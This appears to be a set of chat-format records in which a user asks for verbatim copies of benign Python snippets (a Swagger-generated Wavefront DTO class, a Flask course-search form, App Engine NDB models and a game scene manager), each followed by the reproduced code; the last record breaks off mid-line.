"content": "Here is the snippet:\n<|memory_start|>```python\n# coding: utf-8\n\n\"\"\"\n Wavefront REST API\n\n <p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \\\"Authorization: Bearer <<API-TOKEN>>\\\" to your HTTP requests.</p> # noqa: E501\n\n OpenAPI spec version: v2\n Contact: [email protected]\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass AccessControlListWriteDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'entity_id': 'str',\n 'modify_acl': 'list[str]',\n 'view_acl': 'list[str]'\n }\n\n attribute_map = {\n 'entity_id': 'entityId',\n 'modify_acl': 'modifyAcl',\n 'view_acl': 'viewAcl'\n }\n\n def __init__(self, entity_id=None, modify_acl=None, view_acl=None): # noqa: E501\n \"\"\"AccessControlListWriteDTO - a model defined in Swagger\"\"\" # noqa: E501\n\n self._entity_id = None\n self._modify_acl = None\n self._view_acl = None\n self.discriminator = None\n\n if entity_id is not None:\n self.entity_id = entity_id\n if modify_acl is not None:\n self.modify_acl = modify_acl\n if view_acl is not None:\n self.view_acl = view_acl\n\n @property\n def entity_id(self):\n \"\"\"Gets the entity_id of this AccessControlListWriteDTO. # noqa: E501\n\n The entity Id # noqa: E501\n\n :return: The entity_id of this AccessControlListWriteDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._entity_id\n\n @entity_id.setter\n def entity_id(self, entity_id):\n \"\"\"Sets the entity_id of this AccessControlListWriteDTO.\n\n The entity Id # noqa: E501\n\n :param entity_id: The entity_id of this AccessControlListWriteDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._entity_id = entity_id\n\n @property\n def modify_acl(self):\n \"\"\"Gets the modify_acl of this AccessControlListWriteDTO. # noqa: E501\n\n List of users and user groups ids that have modify permission # noqa: E501\n\n :return: The modify_acl of this AccessControlListWriteDTO. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._modify_acl\n\n @modify_acl.setter\n def modify_acl(self, modify_acl):\n \"\"\"Sets the modify_acl of this AccessControlListWriteDTO.\n\n List of users and user groups ids that have modify permission # noqa: E501\n\n :param modify_acl: The modify_acl of this AccessControlListWriteDTO. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._modify_acl = modify_acl\n\n @property\n def view_acl(self):\n \"\"\"Gets the view_acl of this AccessControlListWriteDTO. # noqa: E501\n\n List of users and user group ids that have view permission # noqa: E501\n\n :return: The view_acl of this AccessControlListWriteDTO. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._view_acl\n\n @view_acl.setter\n def view_acl(self, view_acl):\n \"\"\"Sets the view_acl of this AccessControlListWriteDTO.\n\n List of users and user group ids that have view permission # noqa: E501\n\n :param view_acl: The view_acl of this AccessControlListWriteDTO. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._view_acl = view_acl\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(AccessControlListWriteDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AccessControlListWriteDTO):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n```<|memory_end|>\nOutput a verbatim copy.",
"role": "user"
}
] |
```python
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AccessControlListWriteDTO(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'entity_id': 'str',
'modify_acl': 'list[str]',
'view_acl': 'list[str]'
}
attribute_map = {
'entity_id': 'entityId',
'modify_acl': 'modifyAcl',
'view_acl': 'viewAcl'
}
def __init__(self, entity_id=None, modify_acl=None, view_acl=None): # noqa: E501
"""AccessControlListWriteDTO - a model defined in Swagger""" # noqa: E501
self._entity_id = None
self._modify_acl = None
self._view_acl = None
self.discriminator = None
if entity_id is not None:
self.entity_id = entity_id
if modify_acl is not None:
self.modify_acl = modify_acl
if view_acl is not None:
self.view_acl = view_acl
@property
def entity_id(self):
"""Gets the entity_id of this AccessControlListWriteDTO. # noqa: E501
The entity Id # noqa: E501
:return: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""Sets the entity_id of this AccessControlListWriteDTO.
The entity Id # noqa: E501
:param entity_id: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:type: str
"""
self._entity_id = entity_id
@property
def modify_acl(self):
"""Gets the modify_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user groups ids that have modify permission # noqa: E501
:return: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._modify_acl
@modify_acl.setter
def modify_acl(self, modify_acl):
"""Sets the modify_acl of this AccessControlListWriteDTO.
List of users and user groups ids that have modify permission # noqa: E501
:param modify_acl: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._modify_acl = modify_acl
@property
def view_acl(self):
"""Gets the view_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user group ids that have view permission # noqa: E501
:return: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._view_acl
@view_acl.setter
def view_acl(self, view_acl):
"""Sets the view_acl of this AccessControlListWriteDTO.
List of users and user group ids that have view permission # noqa: E501
:param view_acl: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._view_acl = view_acl
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AccessControlListWriteDTO, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccessControlListWriteDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
```
|
[
{
"content": "Output the full code verbatim (no extra comments):\n```python\n# -*- coding: utf-8 -*-\nfrom flask_wtf import Form\nfrom wtforms import TextField, SelectField, SelectMultipleField, widgets\nfrom wtforms.validators import DataRequired\n\nimport json\nimport os\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\nclass SearchForm(Form):\n CAMPUS_CHOICES = [('umntc', 'Twin Cities'), ('umndl', 'Duluth'),\n ('umnro', 'Rochester'), ('umncr', 'Crookston'),\n ('umnmo', 'Morris')]\n\n TERM_CHOICES = [('1165', 'Summer 2016'), ('1169', 'Fall 2016'), ('1173', 'Spring 2017')]\n\n COMPARE_CHOICES = [('','--choose comparison--'), ('<', 'less than'), ('<=', 'less than or equal to'),\n ('=','equal to'), ('>=', 'greater than or equal to'),\n ('>', 'greater than')]\n\n LEVEL_CHOICES = [('catalog_number<5000', 'Undergraduate Courses'), \n ('catalog_number>4999', 'Graduate and Professional Courses')]\n\n CLE_CHOICES =[('AH', 'Arts and Humanities'), ('BIOL', 'Biological Sciences'), \n ('CIV', 'Civic Life and Ethics'), ('DSJ', 'Diversity and Social Justice'), \n ('ENV', 'Environment'), ('GP', 'Global Perspectives'), ('HIS','Historical Perspectives'), \n ('LITR', 'Literature'), ('MATH', 'Mathmatical Thinking'), ('PHYS', 'Physical Sciences'), \n ('SOCS', 'Social Sciences'), ('TS', 'Technology and Society'), ('WI', 'Writing Intensive')]\n\n GE_CHOICES = [('BIOL SCI', 'Biological Sciences'), ('COMMUNICAT', 'Written/Oral Communications'), \n ('ETH/CIV RE', 'Ethic/Civil Responsibility'), ('GLOB PERSP', 'Global Perspective'), \n ('HI/BEH/SCC', 'History & Behavioral/Social Sciences'), ('HUMAN DIV', 'Human Diversity'), \n ('HUMANITIES', 'Humanities'), ('LIB ED ELC', 'Liberal Education Elective'), \n ('PEOPLE/ENV', 'People/Environment'), ('PHYS SCI', 'Physical Sciences'), \n ('MATH THINK', 'Mathematical Thinking')]\n\n GER_CHOICES = [('ARTP', 'Artistic Performance'), ('HUM', 'Communication, Language, Literature, and Philosophy'), \n ('ECR', 'Ethical & Civic Responsibility'), ('ENVT', 'People and Environment'), \n ('FA', 'Fine Arts'), ('FL', 'Foreign Language'), ('HIST', 'Historical Perspectives'), \n ('SS', 'Human Behavior, Social Processes, and Institutions'), ('HDIV', 'Human Diversity'), \n ('IC', 'Intellectual Community'), ('IP', 'International Perspective'), \n ('M/SR', 'Mathematical/Symbolic Reasoning'), ('SCI', 'Physical & Biological Sciences'), \n ('SCIL', 'Physical & Biological Sciences with Lab'), ('WLA', 'Writing for the Liberal Arts')]\n\n DLE_CHOICES = [('CDIVERSITY', 'Cultural Diversity in the US'), ('FINE ARTS', 'Fine Arts'), ('GLOBAL PER', 'Global Perspectives'), \n ('HUMANITIES', 'Humanities'), ('LOGIC & QR', 'Logic & Quantitative Reasoning'), ('NAT SCI', 'Natural Sciences'), \n ('COMM & LAN', 'Oral Communication & Languages'), ('SOC SCI', 'Social Sciences'), ('SUSTAIN', 'Sustainability'),\n ('WRITING', 'Writing & Information Literacy')]\n\n campus = SelectField(label='Campus', choices=CAMPUS_CHOICES, validators=[DataRequired()])\n cle = MultiCheckboxField(label='Twin Cities/Rochester Liberal Education', choices=CLE_CHOICES)\n dle = MultiCheckboxField(label='Duluth Liberal Education', choices=DLE_CHOICES)\n ge = MultiCheckboxField(label='Crookston Liberal Education', choices=GE_CHOICES)\n ger = MultiCheckboxField(label='Morris Liberal Education', choices=GER_CHOICES)\n term = SelectField(label='Term', choices=TERM_CHOICES, validators=[DataRequired()], default='1159')\n level = SelectField(label='Level', choices=LEVEL_CHOICES, validators=[DataRequired()])\n subject = TextField(label='Subject')\n course_number = TextField(label='Course Number')\n compare = SelectField(label='Course Number', choices=COMPARE_CHOICES)\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n self.user = None\n\n def validate(self):\n found = False\n json_file = '/majors.json'\n initial_validation = super(SearchForm, self).validate()\n if self.course_number.data:\n if self.compare.data == '':\n self.compare.errors.append('Please enter a comparison')\n return False\n\n if str(self.campus.data) == 'umnmo':\n json_file = '/morris.json'\n elif str(self.campus.data) == 'umncr':\n json_file = '/crookston.json'\n elif str(self.campus.data) == 'umndl':\n json_file = '/duluth.json'\n\n json_url = os.path.realpath(os.path.dirname(__file__)) + json_file\n f = open(json_url,'r')\n\n json_data = json.loads(f.read())\n subject = self.subject.data.upper()\n if subject: # make sure to only validate subject if something was entered.\n for key, value in json_data.iteritems():\n if subject == key:\n found = True\n if not found:\n self.subject.errors.append('Please enter a valid course subject')\n return False\n return True\n```",
"role": "user"
}
] |
[
{
"content": "Output the full code verbatim (no extra comments):\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\nfrom flask_wtf import Form\nfrom wtforms import TextField, SelectField, SelectMultipleField, widgets\nfrom wtforms.validators import DataRequired\n\nimport json\nimport os\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\nclass SearchForm(Form):\n CAMPUS_CHOICES = [('umntc', 'Twin Cities'), ('umndl', 'Duluth'),\n ('umnro', 'Rochester'), ('umncr', 'Crookston'),\n ('umnmo', 'Morris')]\n\n TERM_CHOICES = [('1165', 'Summer 2016'), ('1169', 'Fall 2016'), ('1173', 'Spring 2017')]\n\n COMPARE_CHOICES = [('','--choose comparison--'), ('<', 'less than'), ('<=', 'less than or equal to'),\n ('=','equal to'), ('>=', 'greater than or equal to'),\n ('>', 'greater than')]\n\n LEVEL_CHOICES = [('catalog_number<5000', 'Undergraduate Courses'), \n ('catalog_number>4999', 'Graduate and Professional Courses')]\n\n CLE_CHOICES =[('AH', 'Arts and Humanities'), ('BIOL', 'Biological Sciences'), \n ('CIV', 'Civic Life and Ethics'), ('DSJ', 'Diversity and Social Justice'), \n ('ENV', 'Environment'), ('GP', 'Global Perspectives'), ('HIS','Historical Perspectives'), \n ('LITR', 'Literature'), ('MATH', 'Mathmatical Thinking'), ('PHYS', 'Physical Sciences'), \n ('SOCS', 'Social Sciences'), ('TS', 'Technology and Society'), ('WI', 'Writing Intensive')]\n\n GE_CHOICES = [('BIOL SCI', 'Biological Sciences'), ('COMMUNICAT', 'Written/Oral Communications'), \n ('ETH/CIV RE', 'Ethic/Civil Responsibility'), ('GLOB PERSP', 'Global Perspective'), \n ('HI/BEH/SCC', 'History & Behavioral/Social Sciences'), ('HUMAN DIV', 'Human Diversity'), \n ('HUMANITIES', 'Humanities'), ('LIB ED ELC', 'Liberal Education Elective'), \n ('PEOPLE/ENV', 'People/Environment'), ('PHYS SCI', 'Physical Sciences'), \n ('MATH THINK', 'Mathematical Thinking')]\n\n GER_CHOICES = [('ARTP', 'Artistic Performance'), ('HUM', 'Communication, Language, Literature, and Philosophy'), \n ('ECR', 'Ethical & Civic Responsibility'), ('ENVT', 'People and Environment'), \n ('FA', 'Fine Arts'), ('FL', 'Foreign Language'), ('HIST', 'Historical Perspectives'), \n ('SS', 'Human Behavior, Social Processes, and Institutions'), ('HDIV', 'Human Diversity'), \n ('IC', 'Intellectual Community'), ('IP', 'International Perspective'), \n ('M/SR', 'Mathematical/Symbolic Reasoning'), ('SCI', 'Physical & Biological Sciences'), \n ('SCIL', 'Physical & Biological Sciences with Lab'), ('WLA', 'Writing for the Liberal Arts')]\n\n DLE_CHOICES = [('CDIVERSITY', 'Cultural Diversity in the US'), ('FINE ARTS', 'Fine Arts'), ('GLOBAL PER', 'Global Perspectives'), \n ('HUMANITIES', 'Humanities'), ('LOGIC & QR', 'Logic & Quantitative Reasoning'), ('NAT SCI', 'Natural Sciences'), \n ('COMM & LAN', 'Oral Communication & Languages'), ('SOC SCI', 'Social Sciences'), ('SUSTAIN', 'Sustainability'),\n ('WRITING', 'Writing & Information Literacy')]\n\n campus = SelectField(label='Campus', choices=CAMPUS_CHOICES, validators=[DataRequired()])\n cle = MultiCheckboxField(label='Twin Cities/Rochester Liberal Education', choices=CLE_CHOICES)\n dle = MultiCheckboxField(label='Duluth Liberal Education', choices=DLE_CHOICES)\n ge = MultiCheckboxField(label='Crookston Liberal Education', choices=GE_CHOICES)\n ger = MultiCheckboxField(label='Morris Liberal Education', choices=GER_CHOICES)\n term = SelectField(label='Term', choices=TERM_CHOICES, validators=[DataRequired()], default='1159')\n level = SelectField(label='Level', choices=LEVEL_CHOICES, validators=[DataRequired()])\n subject = TextField(label='Subject')\n course_number = TextField(label='Course Number')\n compare = SelectField(label='Course Number', choices=COMPARE_CHOICES)\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n self.user = None\n\n def validate(self):\n found = False\n json_file = '/majors.json'\n initial_validation = super(SearchForm, self).validate()\n if self.course_number.data:\n if self.compare.data == '':\n self.compare.errors.append('Please enter a comparison')\n return False\n\n if str(self.campus.data) == 'umnmo':\n json_file = '/morris.json'\n elif str(self.campus.data) == 'umncr':\n json_file = '/crookston.json'\n elif str(self.campus.data) == 'umndl':\n json_file = '/duluth.json'\n\n json_url = os.path.realpath(os.path.dirname(__file__)) + json_file\n f = open(json_url,'r')\n\n json_data = json.loads(f.read())\n subject = self.subject.data.upper()\n if subject: # make sure to only validate subject if something was entered.\n for key, value in json_data.iteritems():\n if subject == key:\n found = True\n if not found:\n self.subject.errors.append('Please enter a valid course subject')\n return False\n return True\n```<|memory_end|>",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
from flask_wtf import Form
from wtforms import TextField, SelectField, SelectMultipleField, widgets
from wtforms.validators import DataRequired
import json
import os
class MultiCheckboxField(SelectMultipleField):
widget = widgets.ListWidget(prefix_label=False)
option_widget = widgets.CheckboxInput()
class SearchForm(Form):
CAMPUS_CHOICES = [('umntc', 'Twin Cities'), ('umndl', 'Duluth'),
('umnro', 'Rochester'), ('umncr', 'Crookston'),
('umnmo', 'Morris')]
TERM_CHOICES = [('1165', 'Summer 2016'), ('1169', 'Fall 2016'), ('1173', 'Spring 2017')]
COMPARE_CHOICES = [('','--choose comparison--'), ('<', 'less than'), ('<=', 'less than or equal to'),
('=','equal to'), ('>=', 'greater than or equal to'),
('>', 'greater than')]
LEVEL_CHOICES = [('catalog_number<5000', 'Undergraduate Courses'),
('catalog_number>4999', 'Graduate and Professional Courses')]
CLE_CHOICES =[('AH', 'Arts and Humanities'), ('BIOL', 'Biological Sciences'),
('CIV', 'Civic Life and Ethics'), ('DSJ', 'Diversity and Social Justice'),
('ENV', 'Environment'), ('GP', 'Global Perspectives'), ('HIS','Historical Perspectives'),
('LITR', 'Literature'), ('MATH', 'Mathmatical Thinking'), ('PHYS', 'Physical Sciences'),
('SOCS', 'Social Sciences'), ('TS', 'Technology and Society'), ('WI', 'Writing Intensive')]
GE_CHOICES = [('BIOL SCI', 'Biological Sciences'), ('COMMUNICAT', 'Written/Oral Communications'),
('ETH/CIV RE', 'Ethic/Civil Responsibility'), ('GLOB PERSP', 'Global Perspective'),
('HI/BEH/SCC', 'History & Behavioral/Social Sciences'), ('HUMAN DIV', 'Human Diversity'),
('HUMANITIES', 'Humanities'), ('LIB ED ELC', 'Liberal Education Elective'),
('PEOPLE/ENV', 'People/Environment'), ('PHYS SCI', 'Physical Sciences'),
('MATH THINK', 'Mathematical Thinking')]
GER_CHOICES = [('ARTP', 'Artistic Performance'), ('HUM', 'Communication, Language, Literature, and Philosophy'),
('ECR', 'Ethical & Civic Responsibility'), ('ENVT', 'People and Environment'),
('FA', 'Fine Arts'), ('FL', 'Foreign Language'), ('HIST', 'Historical Perspectives'),
('SS', 'Human Behavior, Social Processes, and Institutions'), ('HDIV', 'Human Diversity'),
('IC', 'Intellectual Community'), ('IP', 'International Perspective'),
('M/SR', 'Mathematical/Symbolic Reasoning'), ('SCI', 'Physical & Biological Sciences'),
('SCIL', 'Physical & Biological Sciences with Lab'), ('WLA', 'Writing for the Liberal Arts')]
DLE_CHOICES = [('CDIVERSITY', 'Cultural Diversity in the US'), ('FINE ARTS', 'Fine Arts'), ('GLOBAL PER', 'Global Perspectives'),
('HUMANITIES', 'Humanities'), ('LOGIC & QR', 'Logic & Quantitative Reasoning'), ('NAT SCI', 'Natural Sciences'),
('COMM & LAN', 'Oral Communication & Languages'), ('SOC SCI', 'Social Sciences'), ('SUSTAIN', 'Sustainability'),
('WRITING', 'Writing & Information Literacy')]
campus = SelectField(label='Campus', choices=CAMPUS_CHOICES, validators=[DataRequired()])
cle = MultiCheckboxField(label='Twin Cities/Rochester Liberal Education', choices=CLE_CHOICES)
dle = MultiCheckboxField(label='Duluth Liberal Education', choices=DLE_CHOICES)
ge = MultiCheckboxField(label='Crookston Liberal Education', choices=GE_CHOICES)
ger = MultiCheckboxField(label='Morris Liberal Education', choices=GER_CHOICES)
term = SelectField(label='Term', choices=TERM_CHOICES, validators=[DataRequired()], default='1159')
level = SelectField(label='Level', choices=LEVEL_CHOICES, validators=[DataRequired()])
subject = TextField(label='Subject')
course_number = TextField(label='Course Number')
compare = SelectField(label='Course Number', choices=COMPARE_CHOICES)
def __init__(self, *args, **kwargs):
super(SearchForm, self).__init__(*args, **kwargs)
self.user = None
def validate(self):
found = False
json_file = '/majors.json'
initial_validation = super(SearchForm, self).validate()
if self.course_number.data:
if self.compare.data == '':
self.compare.errors.append('Please enter a comparison')
return False
if str(self.campus.data) == 'umnmo':
json_file = '/morris.json'
elif str(self.campus.data) == 'umncr':
json_file = '/crookston.json'
elif str(self.campus.data) == 'umndl':
json_file = '/duluth.json'
json_url = os.path.realpath(os.path.dirname(__file__)) + json_file
f = open(json_url,'r')
json_data = json.loads(f.read())
subject = self.subject.data.upper()
if subject: # make sure to only validate subject if something was entered.
for key, value in json_data.iteritems():
if subject == key:
found = True
if not found:
self.subject.errors.append('Please enter a valid course subject')
return False
return True
```
|
[
{
"content": "Here is the snippet:\n```python\n# -*- coding: utf-8 -*-\n# Copyright 2021 Green Valley NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.5@@\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb.model import TextProperty, BooleanProperty, JsonProperty, StringProperty\n\nfrom rogerthat.dal import parent_ndb_key\nfrom rogerthat.models import NdbModel\nfrom rogerthat.rpc import users\n\n\nclass TimeblockrSettings(NdbModel):\n url = TextProperty(default=None)\n api_key = TextProperty(default=None)\n enabled = BooleanProperty(default=False)\n\n @property\n def service_user(self):\n return users.User(self.key.id())\n\n @classmethod\n def create_key(cls, service_user):\n return ndb.Key(cls, service_user.email(), parent=parent_ndb_key(service_user))\n\n\nclass TimeblockrAppointment(NdbModel):\n data = JsonProperty(required=True)\n user_email = StringProperty(required=True)\n```\nOutput a verbatim copy.",
"role": "user"
}
] |
[
{
"content": "Here is the snippet:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n# Copyright 2021 Green Valley NV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# @@license_version:1.5@@\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext.ndb.model import TextProperty, BooleanProperty, JsonProperty, StringProperty\n\nfrom rogerthat.dal import parent_ndb_key\nfrom rogerthat.models import NdbModel\nfrom rogerthat.rpc import users\n\n\nclass TimeblockrSettings(NdbModel):\n url = TextProperty(default=None)\n api_key = TextProperty(default=None)\n enabled = BooleanProperty(default=False)\n\n @property\n def service_user(self):\n return users.User(self.key.id())\n\n @classmethod\n def create_key(cls, service_user):\n return ndb.Key(cls, service_user.email(), parent=parent_ndb_key(service_user))\n\n\nclass TimeblockrAppointment(NdbModel):\n data = JsonProperty(required=True)\n user_email = StringProperty(required=True)\n```<|memory_end|>\nOutput a verbatim copy.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
# Copyright 2021 Green Valley NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.5@@
from google.appengine.ext import ndb
from google.appengine.ext.ndb.model import TextProperty, BooleanProperty, JsonProperty, StringProperty
from rogerthat.dal import parent_ndb_key
from rogerthat.models import NdbModel
from rogerthat.rpc import users
class TimeblockrSettings(NdbModel):
url = TextProperty(default=None)
api_key = TextProperty(default=None)
enabled = BooleanProperty(default=False)
@property
def service_user(self):
return users.User(self.key.id())
@classmethod
def create_key(cls, service_user):
return ndb.Key(cls, service_user.email(), parent=parent_ndb_key(service_user))
class TimeblockrAppointment(NdbModel):
data = JsonProperty(required=True)
user_email = StringProperty(required=True)
```
|
[
{
"content": "```python\nimport controller.component\nfrom util import jsonmanager, debug, configuration\nfrom view.entity import Entity\n\n\nclass Scene:\n def __init__(self, name, entities_data):\n self.name = name\n self.entities = []\n self.started_entities = []\n self.event_input = None\n self.cont_input = None\n\n for entity_data in entities_data:\n position = (entity_data[\"X\"], entity_data[\"Y\"])\n\n entity = Entity(entity_data[\"Name\"], position)\n for component_data in entity_data[\"Components\"]:\n try:\n component_constructor = getattr(controller.component, component_data[\"Type\"])\n component = component_constructor()\n component.scene = self\n\n data = component_data[\"ComponentData\"]\n if not len(data) == 0:\n component.load_data(data)\n\n entity.add_component(component)\n except AttributeError:\n debug.log(component_data[\"Type\"] + \" not recognised :/\")\n\n self.entities.append(entity)\n\n def start(self):\n self.event_input = 'none'\n self.cont_input = 'none'\n\n while not self.ready_to_start():\n debug.log('preparing to start entities...')\n entities_to_start = []\n for ent in self.entities:\n if not ent.is_started():\n entities_to_start.append(ent)\n debug.log(str(len(entities_to_start)) + ' entities ready to start.')\n\n debug.log('starting...')\n for entity in entities_to_start:\n try:\n entity.start()\n except Exception as e:\n debug.log('could not start entity. Logging error:')\n debug.log(e)\n\n debug.log('started {0} entities :)'.format(len(self.entities)))\n\n def update(self, event_input, cont_input):\n self.event_input = event_input\n self.cont_input = cont_input\n for entity in self.entities:\n entity.update()\n\n def find_entity(self, entity_name):\n for entity in self.entities:\n if entity.name == entity_name:\n return entity\n return None\n\n def add_entity(self, entity):\n self.entities.append(entity)\n\n def ready_to_start(self):\n for entity in self.entities:\n if not entity.is_started():\n return False\n return True\n\n\nclass SceneManager:\n @staticmethod\n def get_path(scene_name):\n return configuration.scene_data_folder_path + scene_name + '.json'\n\n @staticmethod\n def load_scene(scene_name):\n path = SceneManager.get_path(scene_name)\n scene_data = jsonmanager.get_data(path)\n\n return Scene(scene_name, scene_data['Entities'])\n\n @staticmethod\n def check_if_scene_exists(scene_name):\n path = SceneManager.get_path(scene_name)\n\n return jsonmanager.check_for_file(path)\n```\nProduce the code text exactly, no additions or omissions.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport controller.component\nfrom util import jsonmanager, debug, configuration\nfrom view.entity import Entity\n\n\nclass Scene:\n def __init__(self, name, entities_data):\n self.name = name\n self.entities = []\n self.started_entities = []\n self.event_input = None\n self.cont_input = None\n\n for entity_data in entities_data:\n position = (entity_data[\"X\"], entity_data[\"Y\"])\n\n entity = Entity(entity_data[\"Name\"], position)\n for component_data in entity_data[\"Components\"]:\n try:\n component_constructor = getattr(controller.component, component_data[\"Type\"])\n component = component_constructor()\n component.scene = self\n\n data = component_data[\"ComponentData\"]\n if not len(data) == 0:\n component.load_data(data)\n\n entity.add_component(component)\n except AttributeError:\n debug.log(component_data[\"Type\"] + \" not recognised :/\")\n\n self.entities.append(entity)\n\n def start(self):\n self.event_input = 'none'\n self.cont_input = 'none'\n\n while not self.ready_to_start():\n debug.log('preparing to start entities...')\n entities_to_start = []\n for ent in self.entities:\n if not ent.is_started():\n entities_to_start.append(ent)\n debug.log(str(len(entities_to_start)) + ' entities ready to start.')\n\n debug.log('starting...')\n for entity in entities_to_start:\n try:\n entity.start()\n except Exception as e:\n debug.log('could not start entity. Logging error:')\n debug.log(e)\n\n debug.log('started {0} entities :)'.format(len(self.entities)))\n\n def update(self, event_input, cont_input):\n self.event_input = event_input\n self.cont_input = cont_input\n for entity in self.entities:\n entity.update()\n\n def find_entity(self, entity_name):\n for entity in self.entities:\n if entity.name == entity_name:\n return entity\n return None\n\n def add_entity(self, entity):\n self.entities.append(entity)\n\n def ready_to_start(self):\n for entity in self.entities:\n if not entity.is_started():\n return False\n return True\n\n\nclass SceneManager:\n @staticmethod\n def get_path(scene_name):\n return configuration.scene_data_folder_path + scene_name + '.json'\n\n @staticmethod\n def load_scene(scene_name):\n path = SceneManager.get_path(scene_name)\n scene_data = jsonmanager.get_data(path)\n\n return Scene(scene_name, scene_data['Entities'])\n\n @staticmethod\n def check_if_scene_exists(scene_name):\n path = SceneManager.get_path(scene_name)\n\n return 